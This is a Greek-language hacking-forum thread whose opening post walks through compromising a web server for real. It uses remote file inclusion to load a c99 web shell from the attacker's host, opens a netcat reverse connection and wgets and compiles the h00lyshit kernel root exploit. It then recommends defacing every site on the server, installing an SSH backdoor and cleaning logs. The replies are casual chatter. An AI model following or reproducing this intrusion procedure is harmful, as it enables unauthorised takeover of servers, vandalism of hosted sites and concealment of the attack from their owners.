Jump to content

Recommended Posts

Posted

Τα root exploits μας βοηθάνε να αποκτήσουμε δικαιώματα διαχειριστή σε ένα server.

 

Στο παράδειγμα που ακολουθεί σε server με Safe Mod: OFF χρειαζόμαστε:

 

1)Ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I

η ένα shell στον server που θα έχουμε ανεβάσει με κάποιο τρόπο p.x: ftp.

 

2)Ένα shell (c99,r57,storm,locus) η κάποιο άλλο τις επιλογής σας. (Προσοχή γιατί πολλά είναι backdoor και στέλνουν πληροφορίες σε κάποιον χρηστη για το που έχετε το shell,σε ποιον server.

 

http://rapidshare.com/files/164111549/c99.rar

 

3)Προώθηση μιας πόρτας στο router σας p.x: 1500

 

4)Ένα προγραμματάκι : Netcat V1.1

 

http://rapidshare.com/files/164104973/NETCAT_V1.1.rar

 

5)Root exploit το οποιο πρέπει να ταιριάζει με την έκδοση του πυρήνα του server.

 

 

Βρίσκουμε λοιπόν ένα site/forum με λανθασμένο κώδικα που θα μας επιτρέψει να τρέξουμε ένα shell από τον δικό μας server R.F.I όπως στο παράδειγμα πιο κάτω:

 

http://www.server.com/forum/index.php?page=

 

Μπορούμε να τρέξουμε από το δικό μας server το shell προσθέτοντας το δικό μας σύνδεσμο link στο τέλος:

 

http://www.server.com/forum/index.php?page=http://www.myserver.com/shell.txt?

 

Αυτό το link θα μας φορτώσει το shell όπου μπορούμε να δούμε την έκδοση του πυρήνα p.x:

 

 

 

Μετά από αυτό πρέπει να δημιουργήσουμε μια σύνδεση back connect με τον server χρησιμοποιώντας το ενσωματωμένο module του shell η ανεβάζοντας ένα δικό μας σε ένα φάκελο που μας δίνη το δικαίωμα (writeable).

 

Το πιο εύκολο είναι με το ενσωματωμένο back connect.

 

Ανοίγουμε λοιπόν το Netcat ώστε να είναι σε αναμονή και να περιμένει να γίνει η σύνδεση με το shell πηγαίνοντας:

 

Έναρξη -> Εκτέλεση -> και πληκτρολογούμε cmd

 

Μετά πηγαίνουμε στον φάκελο που είναι εγκατεστημένο το NetCat:

 

π.χ

 

 

   

cd C:\test\Netcat

 

 

 

Και δίνουμε την παρακάτω εντολή:

 

 

   

nc -l -v -n -p 1500

 

 

 

Το NetCat θα μας βγάλει: listening on [any] 1500 ...

 

Στην κεντρική σελίδα του c99 shell πηγαίνουμε εκεί που λέει Tools και στην δεύτερη σειρά παρατηρούμε το Back connection:

 

Εκεί που λέει HOST: βάζουμε την ip μας (μπορούμε να την βρούμε πηγαίνοντας στο site: www.whatismyip.com) και διπλα που λέει Port: 1500 (Είναι η πόρτα που έχουμε ανοίξει στο router μας)

 

Μετά πατάμε connect.

 

Αν τα έχουμε κάνει όλα σωστά θα πρέπει να συνδεθούμε με το netcat και προχωράμε στην διαδικασία του exploit.

 

Θα πρέπει να βρούμε ένα ένα φάκελο που μας δίνει το δικαίωμα (writeable) για να κατεβάσουμε και να κάνουμε compile το Root Exploit, το οποίο θα μας δώσει δικαιώματα διαχειριστή στον server.

 

Για να βρούμε ένα φάκελο που μας δίνει το δικαίωμα (writeable) μπορούμε να τρέξουμε την παρακάτω εντολή:

 

 

   

find / -perm -2 -ls

 

 

 

ή να χρησιμοποιήσουμε το φάκελο tmp που έχει πάντα δικαιώματα writeable.

 

Ας δούμε την περίπτωση του kernel 2.6.9 και την χρήση του φακέλου tmp.

 

Πληκτρολογούμε: cd /tmp

 

Για να κατεβάσουμε το root exploit (αν δεν το έχουμε ήδη έτοιμο compile) χρησιμοποιούμε την εντολή wget:

 

wget http://www.servermeexploits.com/h00lyshit.c

 

Μόλις το κατεβάσουμε θα πρέπει να κάνουμε compile ακολουθώντας τις οδηγίες που βρίσκουμε συνήθως στον κώδικα του exploit.

 

Για το h00lyshit πληκτρολογούμε:

 

 

 

 gcc h00lyshit.c -o h00lyshit

 

 

 

Έτσι δημιουργούμε το εκτελέσιμο αρχείο h00lyshit.

 

Τώρα πρέπει για να το τρέξουμε να δημιουργήσουμε ένα μεγάλο αρχείο στο δίσκο το οποιο χρειάζεται για την σωστή εκτέλεση του.

 

Για να δημιουργήσουμε ένα τέτοιο αρχείο σε κάποιο writeable φάκελο η στο /tmp όπως φαίνεται πιο κάτω στο παράδειγμα μας δίνουμε την εντολή:

 

 

   

dd if=/dev/urandom of=largefile count=2M

 

 

 

("largefile" είναι το όνομα αρχείου που δίνουμε)

 

Περιμένουμε μερικά λεπτά (2-3) μέχρι να ολοκληρωθεί η διαδικασία.

 

Αν δεν ολοκληρωθεί με επιτυχία μπορούμε να δοκιμάσουμε την εντολή:

 

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

 

 

 

Στο τελευταίο στάδιο που είναι η εκτέλεση του exploit δίνουμε την εντολή:

 

 

   

./h00lyshit /tmp/largefile

 

 

 

Αν στον server δεν έχει περαστεί το patch για τον συγκεκριμένο πυρήνα (kernel) θα μας δόση δικαιώματα διαχειριστή (root).

 

Για να το δούμε αυτό πατάμε:

 

 

   

whoami

 

 

 

Αν μας βγάλει root τότε τα κάναμε όλα σωστά !

 

 

Σαν root μπορούμε να κάνουμε όλα τα sites/forums/ deface του server η να βάλουμε κάποιο ssh backdoor όπως το SSHDoor.

 

Καλό θα είναι μετά από όλα αυτά να χρησιμοποιήσουμε κάπιο Log Cleaner όπως το MIG Log Cleaner.

 

Άν βρήτε κάπιο λάθος πείτε μου να το φτιάξω. :)

 

Credits: *Vazelos* (ο οποίος το έστειλε λίγο παλιά στο maxhackers.com)

 

 

Posted

Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)

 

 

Posted

Gia pion logo kaneis bump? Afou blepeis oti dn postaroun h den tous aresei to topic h den se xoneboun (lol)

 

 

 

xD το τελευταίο κάνω σα να μην το είδα :) για τα άλλα δεν ξέρω.... εμένα μου φένεται χρήσιμο guide...

Posted

To guide xrisimo einai, alla poios 8a katsei na ta diabasei ola ayta, poso mallon na ta kanei ki olas.

 

nai dikio exeis... oloi ektos apo legendary,gold,kai moderator einai tempeloskila xD... (e3erountai PANTA kapioi opws ton Coyote™)

 

 

EDITED: thnx kiolas :)

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...